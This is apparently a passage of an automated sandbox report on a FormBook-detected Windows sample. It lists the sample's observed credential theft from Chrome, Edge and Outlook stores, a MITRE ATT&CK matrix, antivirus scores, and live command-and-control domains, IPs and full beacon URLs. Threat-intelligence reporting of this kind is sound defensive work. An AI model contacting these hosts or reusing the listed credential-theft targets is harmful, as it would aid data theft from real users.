Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.4p5XLVXJnq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.4p5XLVXJnq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3911403503.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3913101249.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2498497555.0000000001170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3911348122.00000000043B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2504665836.0000000005390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\DpiScaling.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.4p5XLVXJnq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.4p5XLVXJnq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3911403503.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3913101249.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2498497555.0000000001170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3911348122.00000000043B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2504665836.0000000005390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
4p5XLVXJnq.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
4p5XLVXJnq.exe	72%	Virustotal		Browse
4p5XLVXJnq.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.accusolution.pro/8s4j/?Kd=jthLTDCvcQMkIiWuaX/K6uB1o7SeowFnyQimw/GD7x6/Y+l6zuu1jPcu9YPIxFu2hqeuZobX+ylz2ANUYAJ87sGQ/ef593tMNZAg23aCwNcsxbY/VsSG/4rC7o9NDd+huw==&Gr=hRRPf2Bx	100%	Avira URL Cloud	malware
http://www.deadshoy.tech/k45z/?Kd=Hhv1IBz65eD70HjhCg9ywsDykByP0cXiBlXjDO6l9OvALlXnnYphilqBzmviCqMlGACPw9TT4DmHF7/s/4BbtdMdJsOc8JxZhXcYSMMJNOepRHOr4zrtMEdCk8SbKI6tkg==&Gr=hRRPf2Bx	0%	Avira URL Cloud	safe
http://www.myfastuploader.sbs/wzdf/	0%	Avira URL Cloud	safe
http://www.newbh.pro/67jc/	0%	Avira URL Cloud	safe
http://www.did-ready.info/a8nx/?Gr=hRRPf2Bx&Kd=+ijtfUcEkczZonQRTZPeCxhL9X8p6elqT8rXZI1bhPKlL7JJ7DdsZ8/v+QWmOaPAOWgXu8Ydnt1hKQQAhZJ0WwNa4BdoDk4Jtf0qdRrQh94duU9UXEEBP8Ipt55IFbhY/Q==	0%	Avira URL Cloud	safe
http://www.deadshoy.tech/k45z/	0%	Avira URL Cloud	safe
https://www.myfastuploader.sbs/wzdf/?Kd=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/	0%	Avira URL Cloud	safe
http://www.futurexz.xyz/bhaz/	0%	Avira URL Cloud	safe
http://www.nocoma.berlin/orhf/?Gr=hRRPf2Bx&Kd=stnCcogzN1x+tq8kUR2EOq3j5SEJj27zufK/G0Bkr3foJj/GHhHN2F3DRNNOABXS75shJsHt1p5hW1Jmsa7+eU3aIqXMhH9SH9XwjZlg2EvO5dx+aK8E5fiy4tUvoUJvjQ==	0%	Avira URL Cloud	safe
http://www.nocoma.berlin	0%	Avira URL Cloud	safe
http://www.accusolution.pro/8s4j/	100%	Avira URL Cloud	malware
http://www.nocoma.berlin/orhf/	0%	Avira URL Cloud	safe
http://www.futurexz.xyz/bhaz/?Kd=d3C+EkBuN5s1g6Sv3GF5Q4rw9r47fZ2/rALJg63gfJf8n+sIpfLA3JNW/O2di/HTM2qVhQtzuGVJ+YLVpF6sqJtunC4ShtoFe9xqgD8f0kMZq1MCRe7r1Di4X0JZPZm+NQ==&Gr=hRRPf2Bx	0%	Avira URL Cloud	safe
http://www.myfastuploader.sbs/wzdf/?Kd=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/9Z3uNAs5avQYsDK6NbrpTb32yXtCW6Qn2OjKpMQhR5ymoCju+M+4ZuS09qSIsL0S7/Eveg==&Gr=hRRPf2Bx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.newbh.pro	176.57.65.76	true	false	high
www.deadshoy.tech	199.59.243.228	true	true	unknown
accusolution.pro	185.68.108.243	true	true	unknown
myfastuploader.sbs	136.243.225.5	true	true	unknown
www.did-ready.info	194.245.148.189	true	false	unknown
www.futurexz.xyz	209.74.79.40	true	true	unknown
zcdn.8383dns.com	134.122.135.48	true	false	high
nocoma.berlin	217.160.0.167	true	true	unknown
www.buyspeechst.shop	104.21.64.1	true	true	unknown
www.myfastuploader.sbs	unknown	unknown	false	unknown
www.nocoma.berlin	unknown	unknown	false	unknown
www.jrcov55qgcxp5fwa.top	unknown	unknown	false	unknown
www.1337street.shop	unknown	unknown	false	unknown
www.spindisclite.store	unknown	unknown	false	unknown
www.accusolution.pro	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.deadshoy.tech/k45z/?Kd=Hhv1IBz65eD70HjhCg9ywsDykByP0cXiBlXjDO6l9OvALlXnnYphilqBzmviCqMlGACPw9TT4DmHF7/s/4BbtdMdJsOc8JxZhXcYSMMJNOepRHOr4zrtMEdCk8SbKI6tkg==&Gr=hRRPf2Bx	true	Avira URL Cloud: safe	unknown
http://www.accusolution.pro/8s4j/?Kd=jthLTDCvcQMkIiWuaX/K6uB1o7SeowFnyQimw/GD7x6/Y+l6zuu1jPcu9YPIxFu2hqeuZobX+ylz2ANUYAJ87sGQ/ef593tMNZAg23aCwNcsxbY/VsSG/4rC7o9NDd+huw==&Gr=hRRPf2Bx	true	Avira URL Cloud: malware	unknown
http://www.did-ready.info/a8nx/?Gr=hRRPf2Bx&Kd=+ijtfUcEkczZonQRTZPeCxhL9X8p6elqT8rXZI1bhPKlL7JJ7DdsZ8/v+QWmOaPAOWgXu8Ydnt1hKQQAhZJ0WwNa4BdoDk4Jtf0qdRrQh94duU9UXEEBP8Ipt55IFbhY/Q==	false	Avira URL Cloud: safe	unknown
http://www.futurexz.xyz/bhaz/	true	Avira URL Cloud: safe	unknown
http://www.deadshoy.tech/k45z/	true	Avira URL Cloud: safe	unknown
http://www.newbh.pro/67jc/	true	Avira URL Cloud: safe	unknown
http://www.myfastuploader.sbs/wzdf/	true	Avira URL Cloud: safe	unknown
http://www.nocoma.berlin/orhf/?Gr=hRRPf2Bx&Kd=stnCcogzN1x+tq8kUR2EOq3j5SEJj27zufK/G0Bkr3foJj/GHhHN2F3DRNNOABXS75shJsHt1p5hW1Jmsa7+eU3aIqXMhH9SH9XwjZlg2EvO5dx+aK8E5fiy4tUvoUJvjQ==	true	Avira URL Cloud: safe	unknown
http://www.accusolution.pro/8s4j/	true	Avira URL Cloud: malware	unknown
http://www.nocoma.berlin/orhf/	true	Avira URL Cloud: safe	unknown
http://www.futurexz.xyz/bhaz/?Kd=d3C+EkBuN5s1g6Sv3GF5Q4rw9r47fZ2/rALJg63gfJf8n+sIpfLA3JNW/O2di/HTM2qVhQtzuGVJ+YLVpF6sqJtunC4ShtoFe9xqgD8f0kMZq1MCRe7r1Di4X0JZPZm+NQ==&Gr=hRRPf2Bx	true	Avira URL Cloud: safe	unknown
http://www.myfastuploader.sbs/wzdf/?Kd=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/9Z3uNAs5avQYsDK6NbrpTb32yXtCW6Qn2OjKpMQhR5ymoCju+M+4ZuS09qSIsL0S7/Eveg==&Gr=hRRPf2Bx	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.myfastuploader.sbs/wzdf/?Kd=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/	DpiScaling.exe, 00000009.00000002.3912662659.00000000059CE000.00000004.10000000.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3911491509.000000000331E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	DpiScaling.exe, 00000009.00000002.3912662659.0000000005518000.00000004.10000000.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3911491509.0000000002E68000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.nocoma.berlin	yAMzZKaZoBLE.exe, 0000000B.00000002.3913101249.0000000004BEB000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://joker.com/?pk_campaign=Parking&pk_kwd=text	DpiScaling.exe, 00000009.00000002.3912662659.00000000051F4000.00000004.10000000.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3911491509.0000000002B44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2815333258.000000001EF94000.00000004.80000000.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	4p5XLVXJnq.exe, 00000000.00000002.2222596545.0000000003361000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.strato.de	yAMzZKaZoBLE.exe, 0000000B.00000002.3911491509.00000000037D4000.00000004.00000001.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
176.57.65.76	www.newbh.pro	Bosnia and Herzegowina	47959	TELINEABA	false
136.243.225.5	myfastuploader.sbs	Germany	24940	HETZNER-ASDE	true
217.160.0.167	nocoma.berlin	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
194.245.148.189	www.did-ready.info	Germany	5517	CSLDE	false
209.74.79.40	www.futurexz.xyz	United States	31744	MULTIBAND-NEWHOPEUS	true
199.59.243.228	www.deadshoy.tech	United States	395082	BODIS-NJUS	true
185.68.108.243	accusolution.pro	Spain	201446	PROFESIONALHOSTINGES	true
134.122.135.48	zcdn.8383dns.com	United States	64050	BCPL-SGBGPNETGlobalASNSG	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588793
Start date and time:	2025-01-11 05:40:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	4p5XLVXJnq.exe renamed because original name is a hash value
Original Sample Name:	9bf03ba46e371b24b335b830235845ceb42b215d414eca1aeb91c4d4303da999.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@11/7@11/8
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 97 Number of non-executed functions: 285
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target yAMzZKaZoBLE.exe, PID 1680 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
176.57.65.76	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	www.newbh.pro/67jc/
	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	www.newbh.pro/fpja/?cNPH=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&EtJTX=_JVX4ryxDRQpLJF
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	www.newbh.pro/fpja/?9F=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&wtE0B=1LjxZz
	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	www.newbh.pro/z9pt/
136.243.225.5	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	www.myfastuploader.sbs/wzdf/
136.243.225.5	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	www.myfastuploader.sbs/y3ui/
217.160.0.167	1.exe	Get hash	malicious	FormBook	Browse	www.lacroixundkress.com/jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M
217.160.0.167	SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe	Get hash	malicious	FormBook	Browse	www.skyepattest.com/obc0/?-Zbh98=7PSH/Ln00kiEZ+8VHNPsGnjemOaV3QQvmjWzLH8ChjGT6OrVSUax7xbhQJ4P9gQznTCEUU1HjkXGkkJ8y3lbGhe/UOddQQeZUw==&C0=X82hHfExC6QP
194.245.148.189	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.did-ready.info/89qa/
	wWXR5js3k2.exe	Get hash	malicious	FormBook	Browse	www.wine-drinkers.club/hakt/
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	www.maitreyatoys.world/ib68/
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.maitreyatoys.world/dvmh/?F4=Q0yHy&xP7x=oFIEYIO2gjvnF7MstK6lKHEue9aF/tlAMWbI9WLDgwNy2jujsZOasn0dsRYzh1BdbVLS+4ZlfSYhPFaSDYrrMgKpzoJ2CbempAqVOW6SbKF8YFlZ5FonZlU=
	PAYMENT_ADVICE.exe	Get hash	malicious	FormBook	Browse	www.wine-drinkers.club/hakt/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.maitreyatoys.world/dvmh/
	Project Breakdown Doc.exe	Get hash	malicious	FormBook	Browse	www.wine-drinkers.club/hakt/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.maitreyatoys.world/dvmh/
	Jjfmcz1Hsz.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.apidachicago.org/nqhc/?7nWHV=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&t0D=yFNHS0IX
	Aposporogony.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.apidachicago.org/nqhc/?r4txB=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&1b=S8jD

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.deadshoy.tech	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	199.59.243.228
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	199.59.243.228
	Payment Copy #190922-001.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
zcdn.8383dns.com	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	https://199.188.109.181	Get hash	malicious	Unknown	Browse	134.122.133.80
	0Z2lZiPk5K.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	134.122.133.80
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	inv#12180.exe	Get hash	malicious	FormBook	Browse	154.21.203.24
www.did-ready.info	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
www.futurexz.xyz	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
www.newbh.pro	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	176.57.65.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	136.243.225.5
	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	88.198.8.150
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	88.198.8.150
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	144.76.229.203
	frosty.x86.elf	Get hash	malicious	Mirai	Browse	78.47.94.125
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	95.217.25.228
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	95.217.25.228
	QUOTATION-9044456778.pdf (83kb).com.exe	Get hash	malicious	PureLog Stealer, Quasar	Browse	195.201.57.90
ONEANDONE-ASBrauerstrasse48DE	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	77.68.64.45
	PGK60fNNCZ.exe	Get hash	malicious	FormBook	Browse	74.208.236.156
	zAg7xx1vKI.exe	Get hash	malicious	FormBook	Browse	74.208.236.156
	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	217.160.0.183
	gKvjKMCUfq.exe	Get hash	malicious	FormBook	Browse	217.160.0.113
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	77.68.64.45
	https://media.maxfs.de/	Get hash	malicious	Unknown	Browse	212.227.100.139
	miori.arm5.elf	Get hash	malicious	Unknown	Browse	217.174.247.149
	Onedrive Shared document.html	Get hash	malicious	HTMLPhisher	Browse	77.68.14.124
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	217.160.0.160
CSLDE	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	wWXR5js3k2.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	miori.arm.elf	Get hash	malicious	Unknown	Browse	194.245.229.87
	sh4.elf	Get hash	malicious	Mirai	Browse	194.245.229.64
	Fantazy.arm7.elf	Get hash	malicious	Mirai	Browse	194.245.230.66
	nabmips.elf	Get hash	malicious	Unknown	Browse	159.25.86.139
	nshkmpsl.elf	Get hash	malicious	Mirai	Browse	194.245.230.82
TELINEABA	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	belks.arm.elf	Get hash	malicious	Mirai	Browse	88.214.61.247
	belks.mpsl.elf	Get hash	malicious	Mirai	Browse	88.214.61.239
	na.elf	Get hash	malicious	Mirai	Browse	88.214.61.214
	ImBm40hNZ2.exe	Get hash	malicious	FormBook, GuLoader	Browse	176.57.64.102
	220204-TF1--00.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	20-EM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook	Browse	176.57.64.102

Process:	C:\Users\user\Desktop\4p5XLVXJnq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
